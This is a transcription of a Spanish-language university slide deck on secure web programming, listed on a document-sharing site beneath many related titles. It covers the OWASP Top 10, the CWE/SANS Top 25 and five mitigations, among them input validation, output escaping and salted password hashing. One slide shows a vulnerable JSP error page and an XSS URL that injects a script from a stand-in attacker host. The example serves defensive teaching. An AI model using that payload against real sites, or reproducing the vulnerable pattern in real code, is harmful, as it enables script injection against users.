Recomendaciones para la programación segura de sitios Web

Documentos relacionados
Curso: (30227) Seguridad Informática

GENEXUS & OWASP TOP 10

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

Capítulo 2.- Vulnerabilidades en aplicaciones web.

ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Offensive State Auditoría de Aplicaciones Web

Seminario de SEGURIDAD WEB. Pedro Villena Fernández

Vulnerabilidades en Aplicaciones Web Webinar Gratuito

Hacking Ético Web. I Jornadas Tecnológicas CEEPS Carlos García García i52gagac@uco.es

Seguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010

.com [IN]SEGURIDAD WEB ING. SAUL MAMANI M.

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Segurinfo NOA Seguridad en el desarrollo de aplicaciones Web

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

About Me. Mario Robles Tencio

Curso Online. Desarrollo Seguro en Java

Auditoría Técnica de Seguridad de Aplicaciones Web

OWASP Top Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

Introducción a las Tecnologías web. Luis Marco Giménez Madrid 2003

MASTER PROFESIONAL C# 5 Y ASP.NET MVC 5

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Seguridad en Aplicaciones Web

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

Extensión de módulos de pruebas de seguridad de. la herramienta Webgoat Proyecto OWASP. Daniel Cabezas Molina Daniel Muñiz Marchante 1

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

Seguridad en el desarrollo

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES.

Seguridad en Aplicaciones Web

Programación de código seguro

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información"

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

S E G U R I D A D E N A P L I C A C I O N E S W E B

OWASP Day Costa Rica

Seguridad en Aplicaciones Web

S31_CompTIA Mobile App Security+ for Android

Introducción a OWASP OWASP. The OWASP Foundation

Su Seguridad es Nuestro Éxito

Rafael Doña Gil. Enginyeria Tècnica en Informàtica de Sistemes. Consultor: Jose Juan Rodríguez

Desarrollo Seguro usando OWASP

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

PHP 7 Desarrollar un sitio web dinámico e interactivo

Introducción. Diplomado en Seguridad Informática

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

Servicios Web Requisitos de Cumplimiento de Auditoria Seguridad de la Información

SEGURIDAD EN APLICACIONES WEB LA MEJOR SOLUCIÓN DE ESCANEOPARA APLICACIONES WEB

LBSEC.

Departamento Ingeniería en Sistemas de Información

OWASP: Un punto de vista. aplicaciones web seguras

Gestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP

Programando Aplicaciones Web con Base de Datos y Python

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

Seguridad en el ciclo de vida del desarrollo de software

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

Agenda. I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar

Herramientas de OWASP para Tes3ng de Seguridad. Mateo Mar8nez Voluntario Capítulo OWASP Uruguay h"ps://

Ataques XSS en Aplicaciones Web

ANÁLISIS DE RIESGOS DE LAS APLICACIONES WEB DE LA SUPERINTENDENCIA DE BANCOS Y SEGUROS, UTILIZANDO LAS RECOMENDACIONES TOP TEN DE OWASP.

Mesografía y Bibliografía.

Principios Básicos de Seguridad en Bases de Datos

GeneXus y OWASP TOP 10. Guía de desarrollo GeneXus

Trucos para jugar con la criptografía en el desarrollo. Lic. Cristian Borghello, CISSP - MVP info@segu-info.com.

Desarrollo seguro de aplicaciones y servicios Web en ambiente Java:

Gran número de usuarios accediendo a un único servicio y con un único protocolo. Servidores y clientes con distintos protocolos.

Tendencias en Seguridad y Control en Aplicaciones

Capítulo 5: PRUEBAS.

Testing de Seguridad de Aplicaciones Web

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO FACULTAD DE INFORMATICA Y ELECTRONICA ESCUELA DE INGENIERIA EN SISTEMAS

Su aplicación es segura? Demuéstraselo al auditor ASVS:Application Security Verification Standard

UD2 Documentación 5 Amenazas y Ataques a redes corporativas

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Ingeniería de Aplicaciones Web

Especificaciones Técnicas para Ethical Hacking

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Penetration Testing. Conceptos generales y situación actual. PwC

VPN de acceso remoto. Vicente Sánchez Patón I.E.S Gregorio Prieto. Tema 3 SAD

Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL

OWASP Secure Coding Practices Quick Reference Guide

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

OWASP Testing Guide. John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter

XPERTO EN DISEÑO DE PÁGINAS WEB

Análisis Forense de Aplicaciones Web

SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009

A1-Inyección (SQL,OS Y LDPA)

(Actos no legislativos) REGLAMENTOS

Curso de desarrollo de Aplicaciones Web Seguras

Academia de la carrera de Licenciatura en Informática del Instituto Tecnológico de Aguascalientes

IoT - Internet of Things.

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

CodeSeeker Un Firewall de Nivel 7 OpenSource

Transcripción:

UNIVERSIDAD NACIONAL AUTÓNOMA DE MÉXICO SECRETARÍA GENERAL DIRECCIÓN GENERAL DE CÓMPUTO Y DE TECNOLOGÍAS DE INFORMACIÓN Y COMUNICACIÓN Recomendaciones para la programación segura de sitios Web L.I. Karla Alejandra Fonseca Márquez Ing. Sergio Eduardo Muñoz Siller L.I. Daniel Barajas González

La vida digital En la nube existe un mundo de información, con datos de empresas, cuentas bancarias, datos personales y todo tipo de datos delicados. Los proveedores de estos servicios deben incrementar la seguridad de sus aplicaciones.

Reflexión Como usuario: Cuánta información tienes en la nube? Crees que tus datos están seguros? Confías en los proveedores de los servicios? Como administrador o desarrollador de un sitio Web: Qué tan seguras son tus aplicaciones? Qué tan protegidos están los datos de tus usuarios?

Qué tan segura es tu aplicación Web? Tenemos firewalls instalados Realizamos escaneos en la red Usamos SSL Estamos seguros pues trabajamos dentro de una VPN Nuestra aplicación sólo se usa de manera interna, la seguridad no importa A mi aplicación no le va a pasar No somos el objetivo de los atacantes

Algunas cifras

Una red segura no es suficiente El uso de firewalls ayuda en algunos casos, pero en otros varios no. Los ataques a aplicaciones Web ocurren debido a fallas lógicas en el diseño y/o codificación.

Seguridad de aplicaciones Web Red Host Aplicación Lógica de presentación Lógica de negocio Lógica de acceso a datos Servicios y componentes en ejecución Servicios y componentes de la plataforma Sistema operativo LA SEGURIDAD DEBE APLICARSE EN TODOS LOS NIVELES

Retos en una aplicación Web

Algunas referencias de la industria OWASP Open Web Application Security Project Lista de los 10 riesgos más críticos a los que se enfrentan las aplicaciones Web. Ofrece controles de seguridad y librerías Publicada en 2010 CWE / SANS Common Weakness Enumeration Lista de los errores de software más comunes y críticos que pueden llevar a serias vulnerabilidades (de cualquier tipo, no sólo Web) Publicada en 2011

OWASP TOP 10 Riesgos más críticos a los que se enfrentan las aplicaciones Web

CWE/SANS TOP 25 Errores más comunes y críticos #1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') #2 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') #3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') #4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross -site Scripting') #5 CWE-306 Missing Authentication for Critical Function #6 CWE-862 Missing Authorization #7 CWE-798 Use of Hard-coded Credentials #8 CWE-311 Missing Encryption of Sensitive Data #9 CWE-434 Unrestricted Upload of File with Dangerous Type #10 CWE-807 Reliance on Untrusted Inputs in a Security Decision #11 CWE-250 Execution with Unnecessary Privileges #12 CWE-352 Cross-Site Request Forgery (CSRF) #13 CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') #14 CWE-494 Download of Code Without Integrity Check #15 CWE-863 Incorrect Authorization #16 CWE-829 Inclusion of Functionality from Untrusted Control Sphere #17 CWE-732 Incorrect Permission Assignment for Critical Resource #18 CWE-676 Use of Potentially Dangerous Function #19 CWE-327 Use of a Broken or Risky Cryptographic Algorithm #20 CWE-131 Incorrect Calculation of Buffer Size #21 CWE-307 Improper Restriction of Excessive Authentication Attempts #22 CWE-601 URL Redirection to Untrusted Site ('Open Redirect') #23 CWE-134 Uncontrolled Format String #24 CWE-190 Integer Overflow or Wraparound #25 CWE-759 Use of a One-Way Hash without a Salt

Por dónde empiezo?

Monster Mitigations - CWE/SANS Mitigaciones aplicables y efectivas para prevenir y solucionar las vulnerabilidades del OWASP Top 10 y del CWE/SANS Top 25. Con estas acciones se mitigan errores que incluso no están en el top 25 de errores. Al adoptar estas mitigaciones las aplicaciones serán más seguras.

Monster Mitigations M1. Establece y mantén el control de todas tus entradas M2. Establece y mantén el control de todas tus salidas M3. Asegura el ambiente M5. Usa funciones y librerías aceptadas por la industria en lugar de inventar propias M4. Asume que los componentes externos pueden ser transgredidos y que cualquiera puede leer tu código

M1. Establece y mantén el control de todas tus entradas Definición y objetivos Medida más efectiva que sirve para defenderse de ataques comunes. Se refiere a revisar la validez de los datos antes de que sean procesados. Evita que entren datos maliciosos o incorrectos a la aplicación. Previene el uso de datos maliciosos para la generación de contenidos o comandos. Prácticas Nunca confíes en el usuario. Considera todas las posibles entradas. Los atacantes pueden modificar la petición HTTP (WebScarab, TamperData) Centraliza las validaciones. Siempre valida del lado del servidor. Usa validaciones de lista blanca. Evita validaciones de lista negra. Rechaza datos no válidos. Ataques que se pueden prevenir SQL Injection Insecure Direct Object References Cross-site scripting (XSS) Unvalidated redirects and forwards Ejemplos Tipo de dato, longitud, formato, rango. Uso de expresiones regulares. Reglas de negocio.

M1. Establece y mantén el control de todas tus entradas "Bien hecho, Chang. La muralla ya no es tan grandiosa si olvidas cerrar la puerta."

M2. Establece y mantén el control de todas las salidas Definición y objetivos Medida más efectiva para defenderse de Cross-site scripting. Se refiere a neutralizar los datos potencialmente peligrosos antes de utilizarlos en la generación de contenidos. Evita el uso de datos maliciosos durante la generación de contenidos o comandos. Ataques que se pueden prevenir Prácticas Nunca utilices datos no confiables. Escapa los datos antes de utilizarlos: Etiquetas de contenido HTML Atributos HTML Javascript CSS y la propiedad Style Parámetros URL XML Utiliza librerías aceptadas como OWASP Enterprise Security API (ESAPI). Ejemplos Cross-site scripting (XSS) SQL Injection Insecure Direct Object References Unvalidated redirects and forwards & --> & < --> < > --> > " --> " ' --> &#x27; / --> / <script> <script>

Ejemplo de XSS err.jsp: <% String errmsg = request.getparameter("msg"); %> Ocurrió un error: <%= errmsg %> http://sitio/err.jsp?msg=blah<script src="http://ev.il/xss.js"></script> Ocurrió un error: BLAH

M3. Asegura el ambiente Definición y objetivos Definir y mantener una configuración segura de la aplicación, frameworks, librerías, servidor Web, base de datos y plataformas. Aplicar defensa en profundidad. Ataques que se pueden prevenir Acceso no autorizado a interfaces de administrador servidores y bases de datos. Fuga de información. Cualquiera al que estén expuestos los componentes y librerías no actualizados. Prácticas Aplica las actualizaciones y parches de software y librerías en todos los ambientes. Cambia o deshabilita las contraseñas por default. No almacenes contraseñas en texto claro dentro del código o dentro de la BD. Configura y utiliza elementos con los menos privilegios posibles. Deshabilita o quita características o componentes innecesarios. Mantén por separado los privilegios de administrador. Falla de modo seguro sin exponer más información que la necesaria.

Ejemplo de fuga de información

M4. Asume que los componentes externos pueden ser transgredidos y que cualquiera puede leer tu código Por lo tanto: No dependas de la seguridad por oscuridad. Siempre evalúa si el conocimiento de tu código o diseño hace vulnerable a la aplicación. Nunca confíes en componentes externos, incluso si tú los desarrollaste. Aún el código compilado y/o ofuscado se puede leer. Cifra o encripta los datos sensibles.

Ejemplo: Hashing de contraseñas Nunca almacenes contraseñas en claro. Utiliza un algoritmo conocido y seguro como SHA-256. OJO: MD5 Y SHA-1 ya no deben usarse. A cada contraseña se le asocia una sal única. La sal es una cadena aleatoria de caracteres que debe ser al menos tan larga como el resultado del algoritmo que se utilizará (256 bits si se ocupa SHA-256). No uses las funciones rand() que ofrecen los lenguajes, utiliza una función segura y estándar para generar la sal. Al cambiar la contraseña también debes cambiar la sal.

M5. Usa funciones y librerías aceptadas por la industria en lugar de inventar propias Aplica en: Criptografía, autenticación, autorización, aleatoriedad, manejo de sesión y registro de bitácoras. Investiga cuáles son los algoritmos más seguros en la actualidad y utilízalos. Selecciona lenguajes, librerías o marcos de trabajo que faciliten el uso de esas características. Aléjate de algoritmos secretos o propios.

OWASP Enterprise Security API (ESAPI)

Conclusiones Incorpora la seguridad a lo largo de todo el ciclo de vida del desarrollo de software. Minimiza el área de ataque. Aplica la defensa en profundidad. Utiliza diversos métodos para detectar vulnerabilidades y prevenir riesgos. Mantente informado sobre los riesgos y vulnerabilidades existentes, el top 10 de OWASP es buena referencia.

Bruce Schneier

Referencias OWASP http://www.owasp.org Top 10 http://www.owasp.org/index.php/top_10_2010 A Guide to Building Secure Web Applications and Web Services https://www.owasp.org/index.php/owasp_guide_project ESAPI https://www.owasp.org/index.php/category:owasp_enterprise_s ecurity_api/es CWE / SANS Top 25 http://cwe.mitre.org/top25/index.html

Referencias Fundamental Practices for Secure Software Development http://www.safecode.org/publications/safec ode_dev_practices0211.pdf Infografía sobre el desarrollo de aplicaciones seguras http://www.veracode.com/blog/2012/06/buil ding-secure-web-applications-infographic/

UNIVERSIDAD NACIONAL AUTÓNOMA DE MÉXICO SECRETARÍA GENERAL DIRECCIÓN GENERAL DE CÓMPUTO Y DE TECNOLOGÍAS DE INFORMACIÓN Y COMUNICACIÓN Muchas gracias por su atención

2024 © DocPlayer.es Política de privacidad | Condiciones del servicio | Feedback